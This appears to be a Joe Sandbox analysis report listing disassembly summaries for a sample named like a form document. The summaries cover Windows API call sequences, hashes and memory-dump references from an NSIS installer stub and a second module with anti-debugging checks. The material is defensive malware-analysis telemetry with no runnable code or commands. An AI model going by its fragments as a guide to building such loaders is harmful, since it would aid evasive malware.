Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 4035e1d69ae6314cc4c5b4beec38c6c8f8ea9d5639965bdd3164bea0a22c6a7e
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: D9F0C2979C53703DFA114DB40E81AFE9FCC8A276A2B189A56E144C7283D8958906C3F6

Control-flow Graph

APIs
• #17.COMCTL32 ref: 0040323A
• SetErrorMode.KERNEL32(00008001), ref: 00403245
• OleInitialize.OLE32(00000000), ref: 0040324C
  • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
  • Part of subcall function 0040600B: LoadLibraryA.KERNEL32(?,?,?,0040325E,00000008), ref: 00406028
  • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
• SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403274
  • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,00422EE0,NSIS Error), ref: 00405CED
• GetCommandLineA.KERNEL32(00422EE0,NSIS Error), ref: 00403289
• GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040329C
• CharNextA.USER32(00000000,00429000,00000020), ref: 004032C7
• GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004033C4
• GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004033D5
• lstrcatA.KERNEL32(0042A400,\Temp), ref: 004033E1
• GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004033F5
                                                                                                              • lstrcatA.KERNEL32(0042A400,Low), ref: 004033FD
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040340E
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403416
                                                                                                              • DeleteFileA.KERNEL32(0042A000), ref: 0040342A
                                                                                                              • OleUninitialize.OLE32(?), ref: 004034D8
                                                                                                              • ExitProcess.KERNEL32 ref: 004034F8
                                                                                                              • lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,?), ref: 00403504
                                                                                                              • lstrcmpiA.KERNEL32(0042A400,00429C00), ref: 00403510
                                                                                                              • CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 0040351C
                                                                                                              • SetCurrentDirectoryA.KERNEL32(0042A400), ref: 00403523
                                                                                                              • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357C
                                                                                                              • CopyFileA.KERNEL32(0042AC00,0041E8A0,?), ref: 00403590
                                                                                                              • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BD
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403612
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364E
                                                                                                              • ExitProcess.KERNEL32 ref: 00403671
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                              • String ID: "$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                              • API String ID: 4107622049-2472465286
                                                                                                              • Opcode ID: f1c2d51b410b7d3f0de0b26a2197df22ab01be371bdb435f61116c8a1d7ecd3b
                                                                                                              • Instruction ID: 7fa91be0df980d7df711fed2a4ed052ffc20252d69ef6f5c306a31a697f91405
                                                                                                              • Opcode Fuzzy Hash: f1c2d51b410b7d3f0de0b26a2197df22ab01be371bdb435f61116c8a1d7ecd3b
                                                                                                              • Instruction Fuzzy Hash: C5B117706083516EE7216F659D4DA2B3EACAB45306F44447FF4817A2E2C77C9E01CB6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph: function at 00404948 (installer dialog / image-list setup; basic-block edge list omitted, the API calls it makes are listed under APIs below)
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404960
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 0040496B
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B5
                                                                                                              • LoadBitmapA.USER32(0000006E), ref: 004049C8
                                                                                                              • SetWindowLongA.USER32(?,000000FC,00404F3F), ref: 004049E1
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F5
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A07
                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1D
                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A29
                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A3B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A3E
                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A69
                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A75
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B0A
                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B35
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B49
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404B78
                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B86
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404B97
                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C94
                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF9
                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0E
                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D32
                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D52
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D67
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404D77
                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DF0
                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404E99
                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA8
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00404EC8
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F16
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F21
                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F28
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 6019a7d24dc9c87425b38522d15bedd37beed45e32c0b1a79d6095b94ecd9dc9
                                                                                                              • Instruction ID: f2143584ce3f00a3ae0df77e4ff30717a481f0723155f1d06c12757e5ebf3bcb
                                                                                                              • Opcode Fuzzy Hash: 6019a7d24dc9c87425b38522d15bedd37beed45e32c0b1a79d6095b94ecd9dc9
                                                                                                              • Instruction Fuzzy Hash: E9026FB0900209AFEB10DF54DD85AAE7BB5FB84315F10817AF610BA2E1D7789E42DF58
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(?,?,0042A400,771B2EE0,00000000), ref: 004055C9
                                                                                                              • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405611
                                                                                                              • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405632
                                                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405638
                                                                                                              • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,0042A400,771B2EE0,00000000), ref: 00405649
                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F6
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405707
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: \*.*
                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                              • Opcode ID: ef56282ed887487ddcd5f02f6b3637e78b82bf58436e7ecfd59df446aa7fef5a
                                                                                                              • Instruction ID: be8413790da27f3485791dfb71ea9e97d61aa92783f5c3743ff415ab50f27cdc
                                                                                                              • Opcode Fuzzy Hash: ef56282ed887487ddcd5f02f6b3637e78b82bf58436e7ecfd59df446aa7fef5a
                                                                                                              • Instruction Fuzzy Hash: 6851DE70904A04BAEB217A258D45BAF7AB8DF42714F54453BF404762D2C73C4D82EEAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction ID: 1e8d97365fb74901917855b8d794782cfd73437813f55072e0905c4e61bb52af
                                                                                                              • Opcode Fuzzy Hash: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
                                                                                                              • Instruction Fuzzy Hash: 41F16771D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 333E61DA
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 333E61E4
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 333E61F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 694d312f13123a3aff48ce1a3a6788338dfd649536dcef215a0a54c5de3bbdb9
• Instruction ID: 84ce907bf51b283665300b6c0f0f18f2c095b9d0b838eabd2b2412d229e0c463
• Opcode Fuzzy Hash: 694d312f13123a3aff48ce1a3a6788338dfd649536dcef215a0a54c5de3bbdb9
• Instruction Fuzzy Hash: 7931B375D4122C9BCB61DF64D98879DBBB8AF08310F5081DAE81CA7250E7749F858F45
APIs
• GetCurrentProcess.KERNEL32(?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082,333F2108,0000000C,333E1F3A,?), ref: 333E4AD5
• TerminateProcess.KERNEL32(00000000,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082,333F2108,0000000C,333E1F3A,?), ref: 333E4ADC
• ExitProcess.KERNEL32 ref: 333E4AEE
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 8ce4675ca6d22ab8a7264e3547f75f642dc82764cfa9951abc51175021cefaa6
• Instruction ID: f6610b8f24597bdf81bc60bb8347fd61d41bede8c8c7f928f02088f7aa5ddbd0
• Opcode Fuzzy Hash: 8ce4675ca6d22ab8a7264e3547f75f642dc82764cfa9951abc51175021cefaa6
• Instruction Fuzzy Hash: 8AE04637810228AFCF11BF24CD48A593BAEEF05392B04C010F9159B821DB39EC83CB44
APIs
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 0c3191ee4d5f56cc4785772c898c3afc6eb20a089e996048fcb7e25e812f55ba
• Instruction ID: a39f76672f38a556eacad0849c2acd1780b4cc47efb2bd842c4fb65e203982a8
• Opcode Fuzzy Hash: 0c3191ee4d5f56cc4785772c898c3afc6eb20a089e996048fcb7e25e812f55ba
• Instruction Fuzzy Hash: 9AA011302022028F8320AE30CA0A20C3AECAA022A23088228A808E8000EB28C8028B02

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405169
• GetDlgItem.USER32(?,000003EE), ref: 00405178
• GetClientRect.USER32(?,?), ref: 004051B5
• GetSystemMetrics.USER32(00000015), ref: 004051BD
• SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DE
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051EF
• SendMessageA.USER32(?,00001001,00000000,?), ref: 00405202
• SendMessageA.USER32(?,00001026,00000000,?), ref: 00405210
• SendMessageA.USER32(?,00001024,00000000,?), ref: 00405223
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405245
• ShowWindow.USER32(?,00000008), ref: 00405259
• GetDlgItem.USER32(?,000003EC), ref: 0040527A
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040528A
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A3
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AF
• GetDlgItem.USER32(?,000003F8), ref: 00405187
  • Part of subcall function 00404003: SendMessageA.USER32(00000028,?,?,00403E34), ref: 00404011
• GetDlgItem.USER32(?,000003EC), ref: 004052CB
• CreateThread.KERNEL32(00000000,00000000,Function_0000509D,00000000), ref: 004052D9
• CloseHandle.KERNEL32(00000000), ref: 004052E0
• ShowWindow.USER32(00000000), ref: 00405303
• ShowWindow.USER32(?,00000008), ref: 0040530A
• ShowWindow.USER32(00000008), ref: 00405350
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405384
• CreatePopupMenu.USER32 ref: 00405395
• AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053AA
• GetWindowRect.USER32(?,000000FF), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541F
• OpenClipboard.USER32(00000000), ref: 0040542F
• EmptyClipboard.USER32 ref: 00405435
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040543E
• GlobalLock.KERNEL32(00000000), ref: 00405448
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545C
• GlobalUnlock.KERNEL32(00000000), ref: 00405475
• SetClipboardData.USER32(?,00000000), ref: 00405480
• CloseClipboard.USER32 ref: 00405486
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 590372296-0
• Opcode ID: 56b7aaf2c892c255f7557c50d91ec83cd0e9f82adcc69e5958c84cdd5952280e
• Instruction ID: 6e0b0f1ca08e2e29469adbd3a377171c3ef53385c96749dd380b411ab2712325
• Opcode Fuzzy Hash: 56b7aaf2c892c255f7557c50d91ec83cd0e9f82adcc69e5958c84cdd5952280e
• Instruction Fuzzy Hash: CBA16971900209BFDB21AFA0DD89AAE7F79FB04345F00407AFA05B61A0C7B55E41DF69

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B37
• ShowWindow.USER32(?), ref: 00403B54
• DestroyWindow.USER32 ref: 00403B68
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B84
• GetDlgItem.USER32(?,?), ref: 00403BA5
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB9
• IsWindowEnabled.USER32(00000000), ref: 00403BC0
• GetDlgItem.USER32(?,?), ref: 00403C6E
• GetDlgItem.USER32(?,00000002), ref: 00403C78
• SetClassLongA.USER32(?,000000F2,?), ref: 00403C92
• SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403CE3
• GetDlgItem.USER32(?,00000003), ref: 00403D89
• ShowWindow.USER32(00000000,?), ref: 00403DAA
• EnableWindow.USER32(?,?), ref: 00403DBC
• EnableWindow.USER32(?,?), ref: 00403DD7
• GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DED
• EnableMenuItem.USER32(00000000), ref: 00403DF4
• SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E0C
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1F
• lstrlenA.KERNEL32(0041FCE0,?,0041FCE0,00422EE0), ref: 00403E48
• SetWindowTextA.USER32(?,0041FCE0), ref: 00403E57
• ShowWindow.USER32(?,0000000A), ref: 00403F8B
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID:
• API String ID: 184305955-0
• Opcode ID: 962ad7cc4fa2b42c88e1abd63dfcf2964180e1ed05a6753e58ab042146502ff5
• Instruction ID: 21636550a0957eda034e59b3f0d86482ba9c2b0b2001697664a7690c7cb4d951
• Opcode Fuzzy Hash: 962ad7cc4fa2b42c88e1abd63dfcf2964180e1ed05a6753e58ab042146502ff5
• Instruction Fuzzy Hash: D4C19171A08205BBDB216F61ED49E2B3E7DFB4470AB40443EF601B12E1C7799942EB5E

Control-flow Graph
APIs
  • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
  • Part of subcall function 0040600B: LoadLibraryA.KERNEL32(?,?,?,0040325E,00000008), ref: 00406028
  • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
• lstrcatA.KERNEL32(0042A000,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,0042A400,771B3410,00429000,00000000), ref: 004037E4
• lstrlenA.KERNEL32(00422680,?,?,?,00422680,00000000,00429400,0042A000,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,0042A400), ref: 00403859
• lstrcmpiA.KERNEL32(?,.exe), ref: 0040386C
• GetFileAttributesA.KERNEL32(00422680), ref: 00403877
• LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00429400), ref: 004038C0
  • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
• RegisterClassA.USER32(00422E80), ref: 004038FD
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403915
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040394A
• ShowWindow.USER32(00000005,00000000), ref: 00403980
• LoadLibraryA.KERNEL32(RichEd20), ref: 00403991
• LoadLibraryA.KERNEL32(RichEd32), ref: 0040399C
• GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AC
• GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B9
• RegisterClassA.USER32(00422E80), ref: 004039C2
• DialogBoxParamA.USER32(?,00000000,00403AFB,00000000), ref: 004039E1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                              • API String ID: 914957316-2904746566
                                                                                                              • Opcode ID: f94a0756b1cebeebc8a13aff1c953307ced624bb20df0d09e51a8acfa9e4b9c6
                                                                                                              • Instruction ID: 57fda68e32d43d3754214604e7ed5e061be8654ed587f540489ffd1693c16f19
                                                                                                              • Opcode Fuzzy Hash: f94a0756b1cebeebc8a13aff1c953307ced624bb20df0d09e51a8acfa9e4b9c6
                                                                                                              • Instruction Fuzzy Hash: 6961B3B16442007ED320AF659D45F2B3E6CEB4474AF40457FF944B22E1D7BD6D029A2E

APIs
• CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041A2
• GetDlgItem.USER32(00000000,000003E8), ref: 004041B6
• SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041D4
• GetSysColor.USER32(?), ref: 004041E5
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F4
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404203
• lstrlenA.KERNEL32(?), ref: 00404206
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404215
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040422A
• GetDlgItem.USER32(?,0000040A), ref: 0040428C
• SendMessageA.USER32(00000000), ref: 0040428F
• GetDlgItem.USER32(?,000003E8), ref: 004042BA
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042FA
• LoadCursorA.USER32(00000000,00007F02), ref: 00404309
• SetCursor.USER32(00000000), ref: 00404312
• ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 00404325
• LoadCursorA.USER32(00000000,00007F00), ref: 00404332
• SetCursor.USER32(00000000), ref: 00404335
• SendMessageA.USER32(00000111,?,00000000), ref: 00404361
• SendMessageA.USER32(00000010,00000000,00000000), ref: 00404375
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: N$open$@@
• API String ID: 3615053054-1065644463
• Opcode ID: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
• Instruction ID: 48be33ef10acdba92a50f670ec3bcd7ef70e1bb9311df19d6f40dceb05da6325
• Opcode Fuzzy Hash: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
• Instruction Fuzzy Hash: 306183B1A40205BFEB109F61CC45F6A7B69EB84715F10803AFF05BA2D1C7B8A951CF99

APIs
  • Part of subcall function 333E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D1B
  • Part of subcall function 333E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 333E1D37
  • Part of subcall function 333E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D4B
• _strlen.LIBCMT ref: 333E1855
• _strlen.LIBCMT ref: 333E1869
• _strlen.LIBCMT ref: 333E188B
• _strlen.LIBCMT ref: 333E18AE
• _strlen.LIBCMT ref: 333E18C8
Strings
Memory Dump Source
